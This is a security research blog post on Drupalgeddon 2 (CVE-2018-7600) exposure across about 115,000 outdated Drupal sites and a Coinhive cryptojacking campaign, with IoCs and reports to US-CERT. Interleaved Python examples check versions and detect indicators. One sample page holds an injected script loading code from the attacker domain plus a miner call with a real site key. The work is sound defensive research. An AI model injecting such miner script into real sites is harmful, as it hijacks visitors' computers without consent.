Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal. Using an outdated content management system (CMS) is never best practice.
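The classification used in the scan above (a site is "not vulnerable" at 7.58 or later, "vulnerable" below that, and "unknown" when no version can be read) can be reproduced from a site's own CHANGELOG.txt. The following Python is an added example, not code from this post; it assumes the Drupal 7 CHANGELOG.txt convention of listing the newest release first on a line such as "Drupal 7.58, 2018-03-28", and the sample changelog bodies and site names it contains are constructed for illustration. As the update above notes, a backported patch leaves CHANGELOG.txt unchanged, so "vulnerable" here means "outdated core version", not a confirmed exploitable site.

```python
import re
from typing import Optional, Tuple
from urllib.request import urlopen
from urllib.error import URLError

# Releases at or above this point include the SA-CORE-2018-002 fix; this is the
# threshold the post used to treat a site as "not vulnerable".
PATCHED_MINIMUM: Tuple[int, int] = (7, 58)

# Drupal 7's CHANGELOG.txt lists the newest release first, on a line such as
# "Drupal 7.58, 2018-03-28" (assumed format). The first such line gives the version.
_RELEASE_LINE = re.compile(r"^Drupal\s+(\d+)\.(\d+)\b", re.MULTILINE)


def fetch_changelog(site: str, timeout: float = 10.0) -> Optional[str]:
    """Fetch /CHANGELOG.txt for a site you operate; None on any network or HTTP error."""
    try:
        with urlopen(f"https://{site}/CHANGELOG.txt", timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except (URLError, ValueError, OSError):
        return None


def parse_drupal_version(changelog: Optional[str]) -> Optional[Tuple[int, int]]:
    """Return (major, minor) of the first release entry, or None if there is none."""
    if not changelog:
        return None
    m = _RELEASE_LINE.search(changelog)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2))


def classify(changelog: Optional[str]) -> str:
    """Bucket a site the way the post's scan did: vulnerable / not_vulnerable / unknown."""
    version = parse_drupal_version(changelog)
    if version is None or version[0] != 7:
        # No readable changelog (404, login page, file removed) or not the 7.x branch
        # this rule covers: we cannot tell, so do not guess.
        return "unknown"
    # Integer tuples compare correctly; a string compare would rank "7.9" above "7.58".
    return "not_vulnerable" if version >= PATCHED_MINIMUM else "vulnerable"


def summarize(changelogs: dict) -> dict:
    """Count classifications over a mapping of site -> changelog text (or None)."""
    counts = {"vulnerable": 0, "not_vulnerable": 0, "unknown": 0}
    for text in changelogs.values():
        counts[classify(text)] += 1
    return counts


# Constructed sample changelog bodies (not fetched from any real site).
SAMPLE_PATCHED = (
    "Drupal 7.58, 2018-03-28\n-----------------------\n"
    "- Fixed security issues. See SA-CORE-2018-002.\n\n"
    "Drupal 7.57, 2018-02-21\n"
)
SAMPLE_OUTDATED = "Drupal 7.57, 2018-02-21\n-----------------------\n- Fixed security issues.\n"
SAMPLE_ANCIENT = "Drupal 7.9, 2011-10-26\n----------------------\n- Maintenance release.\n"
SAMPLE_NOT_A_CHANGELOG = "<html><body><h1>Page not found</h1></body></html>"

# Constructed site names; a real run would replace the values with fetch_changelog(site).
SAMPLE_SITES = {
    "a.example": SAMPLE_PATCHED,
    "b.example": SAMPLE_OUTDATED,
    "c.example": SAMPLE_ANCIENT,
    "d.example": SAMPLE_NOT_A_CHANGELOG,
    "e.example": None,
}

if __name__ == "__main__":
    for site, text in SAMPLE_SITES.items():
        print(site, classify(text))
    print(summarize(SAMPLE_SITES))
```

Only run fetch_changelog against sites you operate or are authorised to assess; the offline samples are enough to see how the three buckets fall out.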

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to Let’s Encrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also set up PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One site found in the campaign had upgraded to the latest Drupal version without removing the malicious content. As noted by the Drupal Security Team PSA, “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.

IoCs

Domain / URLs
upgraderservices[.]cf
upgraderservices[.]cf/drupal.js

Coinhive Site Keys
ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos
0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd
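The scan for compromised sites described above matched page content against the campaign's domain, and the case of the site that upgraded Drupal without removing the injected code shows why that check has to be independent of the version check. The Python below is an added example, not code from this post; it takes the IoCs listed above, refangs the defanged domain for matching, and reports which indicators appear in a page. The HTML samples are constructed, including the Coinhive loader snippet, which is shown only in the shape needed to exercise the matcher.

```python
import re
from typing import Dict, List

# Indicators from this post, kept in defanged form so the list is safe to share.
IOC_DOMAINS: List[str] = ["upgraderservices[.]cf"]
IOC_COINHIVE_KEYS: List[str] = [
    "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos",
    "0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd",
]


def refang(indicator: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for matching against live HTML."""
    return indicator.replace("[.]", ".")


def find_iocs(html: str) -> Dict[str, List[str]]:
    """Return the IoC domains and Coinhive site keys referenced in a page body."""
    hits: Dict[str, List[str]] = {"domains": [], "coinhive_keys": []}
    for domain in IOC_DOMAINS:
        # re.escape keeps the dot literal so "upgraderservicesXcf" does not match.
        pattern = re.compile(re.escape(refang(domain)), re.IGNORECASE)
        if pattern.search(html):
            hits["domains"].append(domain)  # report in defanged form
    for key in IOC_COINHIVE_KEYS:
        # Site keys are case-sensitive opaque tokens; a plain substring check is enough.
        if key in html:
            hits["coinhive_keys"].append(key)
    return hits


def is_compromised(html: str) -> bool:
    """True if any indicator from this campaign is present, regardless of Drupal version."""
    hits = find_iocs(html)
    return bool(hits["domains"] or hits["coinhive_keys"])


# Constructed sample pages (not captured from any real site).
SAMPLE_INFECTED = """<html><head>
<script src="https://upgraderservices.cf/drupal.js"></script>
<script>new CoinHive.Anonymous('0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd').start();</script>
</head><body>Welcome</body></html>"""

SAMPLE_CLEAN = "<html><head><title>Clean</title></head><body>Nothing here</body></html>"

if __name__ == "__main__":
    for name, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, is_compromised(page), find_iocs(page))
```

Because the check looks at served content rather than the installed version, it flags the upgraded-but-still-injected case that a CHANGELOG.txt comparison alone would call safe.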

Closing Remarks

While the number of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets
